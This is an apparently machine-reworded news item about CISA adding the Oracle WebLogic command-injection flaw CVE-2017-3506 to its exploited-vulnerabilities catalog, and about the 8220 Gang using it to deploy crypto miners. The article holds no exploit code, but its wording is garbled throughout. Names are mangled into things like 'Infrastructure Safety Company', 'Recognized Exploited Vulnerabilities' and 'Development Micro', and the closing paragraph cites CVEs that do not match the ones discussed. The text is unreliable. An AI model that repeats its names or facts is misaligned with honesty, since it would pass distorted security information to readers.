The U.S. Cybersecurity and Infrastructure Safety Company (CISA) on Thursday added a safety flaw impacting the Oracle WebLogic Server to the Recognized Exploited Vulnerabilities (KEV) catalog, mentioning proof of energetic exploitation.
Tracked as CVE-2017-3506 (CVSS ranking: 7.4), the problem considerations an running device (OS) command injection vulnerability that may be exploited to acquire unauthorized get admission to to inclined servers and take whole keep watch over.
“Oracle WebLogic Server, a product throughout the Fusion Middleware suite, incorporates an OS command injection vulnerability that permits an attacker to execute arbitrary code by means of a specifically crafted HTTP request that features a malicious XML report,” CISA stated.
Whilst the company didn’t expose the character of assaults exploiting the vulnerability, the China-based cryptojacking team referred to as the 8220 Gang (aka Water Sigbin) has a historical past of leveraging it since early remaining 12 months to co-opt unpatched units right into a crypto-mining botnet.
In line with a contemporary file revealed by way of Development Micro, the 8220 Gang has been noticed weaponizing flaws within the Oracle WebLogic server (CVE-2017-3506 and CVE-2023-21839) to release a cryptocurrency miner filelessly in reminiscence by the use of a shell or PowerShell script relying at the running device centered.
“The crowd hired obfuscation tactics, comparable to hexadecimal encoding of URLs and the use of HTTP over port 443, making an allowance for stealthy payload supply,” safety researcher Sunil Bharti stated. “The PowerShell script and the ensuing batch record concerned advanced encoding, the use of setting variables to cover malicious code inside apparently benign script parts.”
In gentle of the energetic exploitation of CVE-2024-1086 and CVE-2024-24919, federal companies are beneficial to use the most recent fixes by way of June 24, 2024, to offer protection to their networks towards attainable threats.